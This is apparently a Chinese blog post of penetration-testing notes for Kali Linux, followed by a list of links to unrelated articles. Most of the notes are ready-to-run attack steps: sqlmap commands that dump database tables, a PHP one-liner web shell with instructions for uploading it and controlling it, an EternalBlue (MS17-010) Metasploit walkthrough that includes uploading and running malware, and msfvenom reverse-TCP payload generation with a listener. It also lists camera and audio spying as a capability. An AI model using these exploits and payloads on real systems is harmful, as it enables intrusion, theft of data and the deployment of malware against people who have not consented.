Kali Linux 渗透测试基础操作与漏洞利用笔记 📅 发布时间:2026/7/11 16:16:23 👁️ 浏览次数: 一、环境准备与系统配置1.1 环境虚拟机平台VMware操作系统Kali Linux网络安全人员专用系统1.2 换源更换为国内镜像源提升下载速度sudo apt update编辑源列表文件sudo nano /etc/apt/sources.list将文件内容替换为国内镜像源如阿里云、清华源等例如deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib保存并退出。1.3 更新软件包sudo apt update sudo apt upgrade -y1.4 设置中文语言环境sudo dpkg-reconfigure locales在界面中勾选zh_CN.UTF-8空格选中Tab键切换到OK将zh_CN.UTF-8设置为默认语言1.5 重启生效sudo reboot二、SQL注入漏洞利用sqlmap2.1 概述sqlmap自动化SQL注入检测与利用工具支持多种数据库MySQL、Oracle等。2.2 基本命令流程步骤命令说明1sqlmap -u 目标URL检测目标URL是否存在SQL注入漏洞2sqlmap -u 目标URL --dbs获取所有数据库名称3sqlmap -u 目标URL -D 数据库名 --tables获取指定数据库中的所有表名4sqlmap -u 目标URL -D 数据库名 -T 表名 --dump获取指定表中的所有数据字段与记录示例sqlmap -u http://example.com/page?id1 --dbs sqlmap -u http://example.com/page?id1 -D users_db --tables sqlmap -u http://example.com/page?id1 -D users_db -T admin --dump三、任意文件上传漏洞利用3.1 漏洞原理网站未对上传文件进行严格验证攻击者可上传恶意脚本如WebShell。3.2 常用工具WebShell木马如一句话木马PHP/ASP/JSP等中国蚁剑一款开源的跨平台WebShell管理工具用于连接并控制目标服务器。3.3 基本利用步骤制作木马例如PHP一句话木马?php eval($_POST[pass]); ?上传木马通过文件上传功能将木马上传到目标服务器。连接木马使用中国蚁剑添加Shell地址如http://target.com/uploads/shell.php和连接密码如pass。提权获取Shell后通过系统漏洞或配置错误提升权限如从普通用户提至root/Administrator。四、永恒之蓝漏洞利用实例MS17-0104.1 背景漏洞编号MS17-010影响2017年WannaCry勒索软件利用该漏洞在全球爆发。靶机Windows 7/2008等未打补丁的系统。4.2 使用Metasploitmsf进行渗透启动msf控制台msfconsole搜索相关漏洞模块search ms17-010常用模块exploit/windows/smb/ms17_010_eternalblue使用模块use exploit/windows/smb/ms17_010_eternalblue查看配置选项options设置必要参数设置目标主机IPrhostsset rhosts 192.168.xxx.xxx设置本地监听IPlhost通常为攻击机IPset lhost 192.168.yyy.yyy可选设置payload如windows/x64/meterpreter/reverse_tcp执行攻击run获取Shell后的简单操作若获得Meterpreter会话可进入系统Shellshell在Windows目标上弹出消息框msg * 你好打开计算器测试命令执行calc上传病毒upload运行病毒execute -f五、部署木马5.1 使用 msfvenom 生成木马Powershell 类型木马示例反向 TCPmsfvenom -p windows/x64/meterpreter/reverse_tcp LHOST192.168.yyy.yyy LPORT4444 -f psh-reflection -o shell.ps15.2 接收木马、监听连接Metasploit Handlermsfconsole use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp options set lhost 192.168.yyy.yyy黑客IP set lport 4444端口 run目标执行木马后handler 会建立 Meterpreter 会话。5.3 MSF 工具功能总结一、MSF控制命令大全二、权限提权与凭证获取渗透核心三、文件系统操作文件管理核心四、网络操作内网渗透关键五、系统操作控制目标主机六、用户界面监控监控、控制目标桌面七、摄像头、音频隐私窃取
[Keil 5] MDK-ARM快速搭建工程教程 提示:本文章旨在快速搭建工程项目(基于GD32芯片),其他方面略过 文章目录 前言 一、准备GD32F470固件库和支持包 二、新建工程文件夹 三、打开Keil5软件 前言 本文档不包含该开发工具的安装指南。 默认您已提前完成该开发环境… 2026/5/17 9:18:35
GESP认证C++编程真题解析 | 202603 四级 编程题 B4501 山之谷 【题目来源】 洛谷:[B4501 GESP202603 四级] 山之谷 - 洛谷 【题目描述】 现有一片山地,可以视为一个 NNN 行 MMM 列的网格图,第 iii 行 jjj 列的海拔为 hi,jh_{i,j}hi,j。 如果一个单元格的海拔不高于其所有相邻… 2026/3/18 16:38:16
mysql事务以及MVCC相关原理 一.事务 提及事务,就绕不开事务的四大特性:原子性,一致性,隔离性,持久性。 事务是一组操作的集合,它是一个不可分割的工作单位,事务会把所有的操作作为一个整体一起向系统提交或撤销操作请求&am… 2026/3/18 16:37:41
CSP 202312-2 因子化简:3种质因数分解算法对比与10^10边界优化 CSP 202312-2 因子化简:3种质因数分解算法对比与10^10边界优化在算法竞赛和编程认证考试中,质因数分解是一个经典且高频出现的问题。CCF CSP认证2023年12月的第二题"因子化简"就考察了这一核心算法能力。本文将深入探讨三种主流质因数分解算法… 2026/7/11 16:16:21
Claude Code 实战:从一次踩坑讲到改进 这篇不先堆名词。我们把《Claude Code 实战:一次新的项目切入》拆成几级台阶,看完至少知道下一步该学什么、该练什么。 摘要 先把这篇文章的目标说清楚:看完之后,你应该能判断这件事值不值得做,以及从哪里动手。 最… 2026/7/11 16:16:21
如何在5分钟内实现Windows和Office永久激活:KMS智能激活完整指南 如何在5分钟内实现Windows和Office永久激活:KMS智能激活完整指南 【免费下载链接】KMS_VL_ALL_AIO Smart Activation Script 项目地址: https://gitcode.com/gh_mirrors/km/KMS_VL_ALL_AIO 还在为Windows系统激活弹窗烦恼吗?KMS智能激活工具是你的… 2026/7/11 16:12:20
STM32F215ZG与MCP3428的高精度数据采集方案解析 1. 为什么选择MCP3428STM32F215ZG组合进行数据采集升级 在工业测量和嵌入式系统中,18位精度的ADC(模数转换器)往往意味着更高的成本和技术门槛。而Microchip的MCP3428系列ADC芯片以极具竞争力的价格提供了18位分辨率,这使其成为中… 2026/7/11 16:12:20
国内合规AI编程助手选型指南:通义灵码、CodeArts Snap等四款工具对比 我不能提供任何关于绕过国家网络监管或使用未经批准的境外互联网信息服务的建议。根据中国法律法规,所有互联网信息服务必须遵守《中华人民共和国网络安全法》《互联网信息服务管理办法》等规定。ClaudeCode是由Anthropic公司开发的AI编程辅助工具,目前未… 2026/7/11 16:10:20
Qwen3-30B-FP8模型推理优化技巧:10个提升性能的关键配置 Qwen3-30B-FP8模型推理优化技巧:10个提升性能的关键配置 【免费下载链接】Qwen3-30B-A3B-Thinking-2507-FP8 项目地址: https://ai.gitcode.com/hf_mirrors/amd/Qwen3-30B-A3B-Thinking-2507-FP8 Qwen3-30B-A3B-Thinking-2507-FP8是基于Qwen3-30B-A3B-Think… 2026/7/11 16:08:19
5分钟搞定Kodi字幕难题:智能字幕插件让你追剧无忧 [特殊字符] 5分钟搞定Kodi字幕难题:智能字幕插件让你追剧无忧 🎬 【免费下载链接】zimuku_for_kodi Kodi 插件,用于从「字幕库」网站下载字幕 项目地址: https://gitcode.com/gh_mirrors/zi/zimuku_for_kodi 还记得那个深夜吗?你刚下载… 2026/7/11 0:00:11
工业信号干扰处理与FOD4216光耦应用实战 1. 工业环境中的信号干扰挑战在工业自动化领域,信号采集的准确性直接关系到整个控制系统的可靠性。典型的工业现场充斥着各种干扰源:大功率电机启停产生的电磁干扰、变频器工作产生的高频噪声、继电器触点火花放电,以及长距离传输引入的共模干… 2026/7/11 0:00:11
OpenHarmony 完整项目工程整合规范 + 模块化分层架构(API23+ 标准企业级结构) 摘要前面系列教程覆盖了 ArkUI 组件、路由、生命周期、本地存储、网络请求、Ability 底层全套基础能力,本篇统一梳理标准工程目录分层、模块化拆分、代码复用规范、全局工具统一管理、项目打包权限配置、常见工程报错统一解决方案,形成可直接用于课程设计… 2026/7/11 0:00:11
6个月转型AI工程师:实战路径与核心技能 1. 项目概述:6个月转型AI工程师的可行性路径在2023年大模型技术爆发的背景下,AI工程师岗位需求同比增长217%(LinkedIn数据)。不同于传统算法工程师需要3-5年培养周期,现代AI工程师更侧重工程化落地能力。我在硅谷科技公… 2026/7/11 14:53:30
TPAFE0808与PIC18F87K22的多通道信号采集方案 1. 项目背景与核心需求在工业自动化、医疗设备和科研仪器等领域,多通道信号采集与系统监测是基础且关键的技术需求。传统方案往往面临通道数量不足、信号调理复杂、系统集成度低等问题。TPAFE0808作为一款8通道模拟前端芯片,与PIC18F87K22微控制器的组合… 2026/7/11 12:30:52
STC3115与PIC18LF26K80构建高精度电池管理系统 1. STC3115与PIC18LF26K80在电池管理系统中的核心价值在现代电子设备中,电池管理系统(BMS)的重要性不亚于设备的核心处理器。STC3115作为一款高精度电池电量监测IC,与PIC18LF26K80微控制器的组合,构成了一个既能精确监控又能智能管理的完整解… 2026/7/11 15:29:59